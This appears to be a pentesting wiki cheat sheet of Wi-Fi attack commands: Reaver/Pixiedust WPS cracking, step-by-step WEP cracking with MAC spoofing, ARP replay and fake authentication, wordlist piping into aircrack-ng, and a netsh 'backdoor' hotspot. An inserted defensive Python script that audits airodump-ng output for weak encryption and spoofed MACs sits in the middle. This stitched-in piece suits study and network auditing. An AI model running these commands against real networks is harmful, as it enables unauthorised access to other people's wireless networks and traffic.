From BHaFSec Pentesting Notes Wiki

REAVER / Pixiedust:

reaver -i wlan1mon -c<chan#> -b <MACaddy> -vvv -K 1 

Let's put the Wi-Fi interface in monitor mode using:

airmon-ng start wlan0

Start airodump-ng to get the BSSID, MAC address and channel of our target.

airodump-ng -i wlan0mon

Now pick the target and use the BSSID and the channel for Reaver:

reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]

We need the PKE, PKR, E-Hash1, E-Hash2, E-Nonce/R-Nonce and AuthKey values from Reaver's output to feed to pixiewps. With the -P (Pixie Dust loop) option, Reaver enters a loop mode that deliberately breaks the WPS protocol by not using the M4 message, which avoids lockouts. This option is only useful for collecting the Pixie Dust hashes for use with pixiewps.

WEP Cracking - Manually

Set up the Wi-Fi card in monitor mode and change its MAC

ifconfig wlan0 down 
macchanger --mac DE:AD:BE:EF:BA:BE wlan0
airmon-ng start wlan0
airodump-ng wlan0mon

Start the capture on the target channel

airodump-ng -c 11 --bssid <VictimMAC> -w output_01 wlan0mon 

ARP request replay

aireplay-ng -3 -b <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

Fake authentication with the AP

aireplay-ng -1 0 -e <VictimSSID> -a <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

For picky access points

aireplay-ng -1 6000 -o 1 -q 10 -e <VictimSSID> -a <VictimMAC> -h DE:AD:BE:EF:BA:BE wlan0mon 

Wait for the #Data column to pass 10000 IVs

crack dat shit

aircrack-ng -b <VictimMAC> output_01-01.cap 
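As an added defender-side example (not from the wiki), the following Python parses the CSV that `airodump-ng -w` writes beside the .cap file and flags exactly what the WEP notes above rely on: WEP or open APs, TKIP ciphers, WEP APs that have already leaked more than 10000 IVs, and associated clients whose MAC has the locally-administered bit set, as it does after macchanger. The sample CSV is constructed, and the column layout assumed is airodump-ng's standard CSV export.

```python
import csv
import io

# Constructed sample in airodump-ng's CSV layout (not a real capture): a WEP AP that has
# already leaked enough IVs, a WPA2/CCMP AP, an open AP, and two associated clients.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:09:00, 11, 54, WEP , WEP, OPN, -40, 900, 12450, 0.  0.  0.  0, 6, OldNet, 
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:09:00,  6, 54, WPA2, CCMP, PSK, -55, 880, 300, 0.  0.  0.  0, 7, HomeNet, 
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:09:00,  1, 54, OPN , , , -60, 850, 50, 0.  0.  0.  0, 5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:BA:BE, 2024-01-01 10:02:00, 2024-01-01 10:09:00, -48, 11800, 00:11:22:33:44:55, 
3C:22:FB:11:22:33, 2024-01-01 10:03:00, 2024-01-01 10:09:00, -50, 120, 66:77:88:99:AA:BB, HomeNet
"""

WEP_IV_THRESHOLD = 10000  # the "#Data over 10000 IVs" mark from the WEP notes above

def _rows(block):
    """Parse one airodump-ng CSV section into dicts keyed by the stripped header names."""
    reader = csv.reader(io.StringIO(block), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [{h: v.strip() for h, v in zip(header, rec)} for rec in reader if rec and rec[0].strip()]

def parse_airodump_csv(text):
    """Return (access_points, stations); airodump separates the two sections with a blank line."""
    ap_block, _, sta_block = text.replace("\r\n", "\n").strip().partition("\n\n")
    return _rows(ap_block), _rows(sta_block)

def is_locally_administered(mac):
    """U/L bit (0x02 of the first octet) set: the MAC was assigned by software, e.g. by macchanger."""
    return bool(int(mac.split(":")[0], 16) & 0x02)

def audit(text):
    """Return (kind, address, detail) findings a network owner would want to act on."""
    aps, stations = parse_airodump_csv(text)
    findings = []
    for ap in aps:
        priv, cipher, essid = ap["Privacy"], ap["Cipher"], ap["ESSID"]
        if priv in ("WEP", "OPN"):
            findings.append(("weak_encryption", ap["BSSID"], f"{essid}: {priv}"))
        elif "TKIP" in cipher:
            findings.append(("weak_cipher", ap["BSSID"], f"{essid}: {cipher}"))
        if priv == "WEP" and int(ap["# IV"] or 0) >= WEP_IV_THRESHOLD:
            findings.append(("wep_iv_threshold", ap["BSSID"], f"{ap['# IV']} IVs captured"))
    for sta in stations:
        if is_locally_administered(sta["Station MAC"]):
            findings.append(("spoofed_client_mac", sta["Station MAC"], f"associated to {sta['BSSID']}"))
    return findings
```

Run `audit(open("output_01-01.csv").read())` against a real survey of your own networks; anything returned is a WEP/open/TKIP network to migrate or an unexpected software-assigned client MAC to investigate.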

Connect to Wi-Fi without a .conf file

wpa_passphrase "ESSID" "Password" | wpa_supplicant -Dwext -iwlan0 -c/dev/stdin&

Win7 WIFI Backdoor

netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<password> keyUsage=[persistent|temporary]
netsh wlan [start|stop] hostednetwork

Pipe candidate passwords from hashcat or john into aircrack-ng

./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w -  capture_file.cap